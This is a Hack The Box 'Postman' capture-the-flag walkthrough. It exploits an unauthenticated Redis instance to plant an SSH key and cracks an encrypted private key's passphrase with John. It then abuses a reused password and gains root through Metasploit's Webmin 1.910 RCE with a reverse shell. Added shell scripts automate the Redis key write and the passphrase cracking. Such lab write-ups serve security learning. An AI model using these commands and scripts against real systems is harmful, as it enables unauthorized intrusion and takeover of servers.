HTB Postman

$ nmap -A -p- -T4 10.10.10.160

Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 10:05 CET
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.039s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.98 seconds

Open ports:

  • 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
  • 6379/tcp open redis Redis key-value store 4.0.9
  • 10000/tcp open http MiniServ 1.910 (Webmin httpd)

$ gobuster dir -u http://10.10.10.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.160
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/11/14 10:19:08 Starting gobuster
===============================================================
http://10.10.10.160/images (Status: 301)
http://10.10.10.160/upload (Status: 301)
http://10.10.10.160/css (Status: 301)
http://10.10.10.160/js (Status: 301)
http://10.10.10.160/fonts (Status: 301)
http://10.10.10.160/server-status (Status: 403)
===============================================================
2020/11/14 10:40:54 Finished
===============================================================

Access to http://10.10.10.160: the static personal website, nothing interactive.

Access to http://10.10.10.160:10000 and https://10.10.10.160:10000: the Webmin login page, which asks for a username and password.

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker (description from the Redis project). By default Redis speaks a plain-text protocol (RESP), but keep in mind that it can also be deployed behind TLS; the Redis documentation describes how to run it with SSL/TLS.

https://redis.io/

Default port: 6379

PORT     STATE SERVICE  VERSION
6379/tcp open  redis    Redis key-value store 4.0.9

Information about how to attack a Redis instance can be found at:

https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

$ redis-cli -h 10.10.10.160

10.10.10.160:6379>

No credentials are needed: the instance has no requirepass set, so anyone who can reach 6379/tcp gets full command access.

10.10.10.160:6379> info

# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:652
run_id:117c0dfdc1040fa8415cd84b0a23020f5b170cc9
tcp_port:6379
uptime_in_seconds:6843
uptime_in_days:0
hz:10
lru_clock:11515720
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

A Redis instance that accepts unauthenticated connections and still honours CONFIG gives an attacker a file write: CONFIG SET dir and CONFIG SET dbfilename choose where the next RDB dump is written, SAVE writes it, and the dump carries whatever values we stored. This is not specific to one release (unauthenticated 4.x and 5.x instances are additionally exploitable for code execution through the replication/MODULE LOAD trick, but the file write is all we need here, because the dump directory is the redis user's home).

The current dump directory is:

10.10.10.160:6379> config get dir

1) "dir"
2) "/var/lib/redis"

10.10.10.160:6379> config get key

(empty array)

Before this point a key pair was generated on the attacking machine (the private half is the file postman used below). The public key, padded with blank lines on both sides so that it lands on a line of its own inside the binary RDB dump, was stored under the key ssh_key (for example with redis-cli -x, which reads the value from stdin). Reading it back confirms the padding survived:

10.10.10.160:6379> GET ssh_key

"\n\n\nssh-rsa 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 ruben@kali\n\n\n\n"

Now point the dump directory at the redis user's .ssh directory (CONFIG SET dir only succeeds if the directory already exists and is writable by the redis user, which it is here), name the dump file authorized_keys and SAVE to write it:

10.10.10.160:6379> config set dir /var/lib/redis/.ssh

OK

10.10.10.160:6379> config set dbfilename authorized_keys

OK

10.10.10.160:6379> save

OK
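The Redis steps above collapsed into one script that speaks RESP directly (the protocol redis-cli wraps), so it can be piped into nc when redis-cli is not available. This is an added example, not part of the original write-up; the host, the .ssh path, the key file and the nc invocation are assumptions. It also emits the commands to put the dump location back, which the write-up skips: after SAVE the instance keeps dumping to authorized_keys on every later SAVE or BGSAVE until the config is restored.

```shell
#!/bin/sh
# Added example, not from the original write-up: drive the Redis
# CONFIG SET dir / dbfilename / SAVE file write over raw RESP, so that it can
# be piped into nc when redis-cli is not around. Host, paths and key file are
# assumptions for the sake of the example.

NL=$(printf '\nx'); NL=${NL%x}   # a literal newline, POSIX-portable

# Encode one command as a RESP array: "*<argc>\r\n" followed by
# "$<len>\r\n<arg>\r\n" per argument. Bulk strings are length-prefixed, so an
# argument may contain newlines (the padded key relies on that). Arguments are
# assumed ASCII, since ${#a} counts characters rather than bytes.
resp() {
    printf '*%d\r\n' "$#"
    for a in "$@"; do
        printf '$%d\r\n%s\r\n' "${#a}" "$a"
    done
}

# Emit the four commands that plant a public key: store it padded with blank
# lines (the RDB file has a binary header and trailer on the same "lines",
# and sshd skips authorized_keys lines it cannot parse), point the dump at the
# target directory and file name, then SAVE to write it. CONFIG SET dir fails
# unless the directory already exists and is writable by the redis user.
plant_key() {
    pub=$1; dir=$2; file=$3
    resp SET ssh_key "$NL$NL$pub$NL$NL"
    resp CONFIG SET dir "$dir"
    resp CONFIG SET dbfilename "$file"
    resp SAVE
}

# Put the dump location back afterwards (use the values CONFIG GET dir and
# CONFIG GET dbfilename returned beforehand), otherwise every later SAVE or
# BGSAVE keeps overwriting authorized_keys.
restore_dump() {
    resp CONFIG SET dir "$1"
    resp CONFIG SET dbfilename "$2"
}

# Count "+OK" replies in the server's response; plant_key should yield 4.
# "-NOAUTH ..." means requirepass is set, "-ERR unknown command" on CONFIG
# means the command was renamed or disabled, and this primitive is gone.
count_ok() {
    tr -d '\r' | grep -c '^+OK$'
}

# Usage (assumed target):
#   plant_key "$(cat postman.pub)" /var/lib/redis/.ssh authorized_keys \
#       | nc 10.10.10.160 6379 | count_ok
#   restore_dump /var/lib/redis dump.rdb | nc 10.10.10.160 6379
```

With netcat-openbsd add -q 1 to nc so it waits for the four replies after stdin closes. The fix on the defending side is the mirror image of what the script relies on: bind Redis to localhost or a private interface, set requirepass, and rename or disable CONFIG in redis.conf.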

With the private half of the key pair we can now log in as the redis user:

$ ssh -i postman redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Nov 14 15:28:55 2020 from 10.10.14.39
redis@Postman:~$

redis@Postman:~$ whoami

redis

Let's run linpeas for deeper enumeration of the box, looking for a way to move from the redis service account to a user and then to root.

redis@Postman:~$ ./linpeas.sh

Analyzing the results, the interesting finding is a backup of an SSH private key in /opt:

[+] Searching ssl/ssh files
/var/lib/redis/.ssh/authorized_keys
/var/lib/redis/.ssh/known_hosts
/usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
/usr/src/linux-headers-4.15.0-58/scripts/config
/opt/id_rsa.bak
Port 22
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
 --> /etc/hosts.allow file found, read the rules:
/etc/hosts.allow

redis@Postman:/opt$ ls -la

total 12
drwxr-xr-x  2 root root 4096 Sep 11  2019 .
drwxr-xr-x 22 root root 4096 Sep 30 16:14 ..
-rwxr-xr-x  1 Matt Matt 1743 Aug 26  2019 id_rsa.bak
redis@Postman:/opt$

The file is Matt's private key, and it is world-readable, so the redis user can read it:

redis@Postman:/opt$ cat /opt/id_rsa.bak

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
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-----END RSA PRIVATE KEY-----
redis@Postman:/opt$

The key is passphrase-protected (Proc-Type: 4,ENCRYPTED, DEK-Info: DES-EDE3-CBC), so the passphrase can be brute-forced offline with John the Ripper.

Copy the key to a file on our machine (here priv_id.key), convert it to John's format with ssh2john and run it against rockyou:

$ python2 /usr/share/john/ssh2john.py priv_id.key > hash.txt
$ john hash.txt --wordlist=../rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (priv_id.key)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:11 DONE (2020-11-14 17:37) 0.08445g/s 1211Kp/s 1211Kc/s 1211KC/sa6_123..*7¡Vamos!
Session completed

The passphrase is computer2008. John warns that this format can emit false positives, so a candidate it reports is worth confirming; the su below does that.
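The cracking step as a script, an added example rather than the write-up's own commands: it tries a wordlist against an encrypted PEM key with openssl as the oracle, which is the slow but exact version of what ssh2john + john do (a candidate only counts if the fully decrypted key parses, so there are none of the false positives John warns about). Paths and the wordlist are assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up: brute-force the passphrase of
# an encrypted PEM private key with openssl as the oracle. It is the slow but
# exact version of what ssh2john + john did above: a candidate counts only if
# the decrypted key parses. Paths and the wordlist are assumptions.

# Exit 0 if the passphrase decrypts and parses the key. "openssl rsa -noout"
# loads the key (traditional DEK-Info PEM like the one found in /opt, or
# PKCS#8) and writes nothing.
try_pass() {
    openssl rsa -in "$1" -passin "pass:$2" -noout >/dev/null 2>&1
}

# Walk a wordlist (one candidate per line, empty lines skipped), print the
# first passphrase that works and return 0; return 1 if none does.
crack_pem() {
    key=$1; wordlist=$2
    while IFS= read -r cand || [ -n "$cand" ]; do
        [ -n "$cand" ] || continue
        if try_pass "$key" "$cand"; then
            printf '%s\n' "$cand"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Usage (assumed files):
#   crack_pem /tmp/priv_id.key /usr/share/wordlists/rockyou.txt
```

Spawning openssl per candidate manages a few hundred tries per second against the 1.2M/s John shows above, so this is for confirming a hit or for a short, targeted list, not for a full rockyou run.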

SSH password login as Matt is refused:

$ ssh Matt@10.10.10.160

Matt@10.10.10.160's password: 
Permission denied, please try again.

The passphrase is reused as Matt's system password, though, so su from the redis shell works:

redis@Postman:/opt$ su Matt

Password: 
Matt@Postman:/opt$

Matt@Postman:/opt$ cd /home/Matt/
Matt@Postman:~$ cat user.txt

501eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Remember the Webmin login on port 10000?

It authenticates against system accounts, and we now have Matt's password, so Matt / computer2008 logs us in.

The Webmin version is also confirmed on the box:

Matt@Postman:/etc/webmin$ cat version

1.910

According to searchsploit, that version has a known authenticated RCE:

Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)

It needs a user allowed to use the Package Updates module; let's run Metasploit.

msf6 > search webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor
   3  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution
   4  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution
   5  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE

Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/webapp/webmin_upload_exec

msf6 > use 3

[*] Using configured payload cmd/unix/reverse_perl

msf6 exploit(linux/http/webmin_packageup_rce) > show info

Name: Webmin Package Updates Remote Command Execution
     Module: exploit/linux/http/webmin_packageup_rce
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-05-16

Provided by:
  AkkuS <Özkan Mustafa Akkuş>

Available targets:
  Id  Name
  --  ----
  0   Webmin <= 1.910

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Webmin Password
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      10000            yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path for Webmin application
  USERNAME                    yes       Webmin Username
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 512

Description:
  This module exploits an arbitrary command execution vulnerability in 
  Webmin 1.910 and lower versions. Any user authorized to the "Package 
  Updates" module can execute arbitrary commands with root privileges.

References:
  https://cvedetails.com/cve/CVE-2019-12840/
  https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html

msf6 exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910

msf6 exploit(linux/http/webmin_packageup_rce) > set password computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > set rhost 10.10.10.160
msf6 exploit(linux/http/webmin_packageup_rce) > set username Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.14.5
msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[-] Exploit aborted due to failure: unknown: Failed to retrieve session cookie
[*] Exploit completed, but no session was created.
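To see why this run failed, here is the login step the module performs before the exploit, done by hand with curl. This is an added example, not the module's code or the original write-up; host, port and credentials are assumptions, and /session_login.cgi, the user/pass fields, the testing=1 cookie the login page sets and the sid session cookie are Webmin's stock login mechanics.

```shell
#!/bin/sh
# Added example, not from the original write-up: redo the login step of the
# Metasploit module by hand to see why "Failed to retrieve session cookie"
# happened. Host, port and credentials are assumptions; the endpoint, form
# fields and cookies are those of Webmin's stock login form.

# Print the value of the sid cookie from raw HTTP response headers on stdin
# (empty when none was set, which is exactly the module's failure).
extract_sid() {
    tr -d '\r' | sed -n 's/^[Ss]et-[Cc]ookie:[[:space:]]*sid=\([^;]*\).*/\1/p' | head -n 1
}

# MiniServ configured for SSL answers a plaintext request with a short
# "running in SSL mode" page instead of the login form.
webmin_wants_tls() {
    curl -s -m 10 "http://$1:$2/" | grep -q 'running in SSL mode'
}

# Post the credentials like the login form does and print the session id.
webmin_login() {
    host=$1; port=$2; user=$3; pass=$4; scheme=${5:-https}
    curl -k -s -m 10 -D - -o /dev/null \
        -b 'testing=1' \
        --data-urlencode "user=$user" --data-urlencode "pass=$pass" \
        "$scheme://$host:$port/session_login.cgi" | extract_sid
}

# Usage (assumed target):
#   webmin_wants_tls 10.10.10.160 10000 && echo "use SSL"
#   webmin_login 10.10.10.160 10000 Matt computer2008 https
```

Run against a Webmin in SSL mode, the http variant prints nothing (no sid was set) and the https variant prints the session id, which is the same test the module makes before deciding whether to continue.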

The login request went out in plaintext, but this Webmin only answers on port 10000 over TLS, so no sid cookie came back. Enable SSL (the port stays 10000) and run again:

msf6 exploit(linux/http/webmin_packageup_rce) > set ssl true

[!] Changing the SSL option's value may require changing RPORT!

ssl => true
msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[+] Session cookie: 0ef38e551a4d793163480d7ecde57a55
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.160:58664) at 2020-11-14 18:39:29 +0100

whoami

root

cat /root/root.txt

1f29XXXXXXXXXXXXXXXXXXXXXXXXXXXX
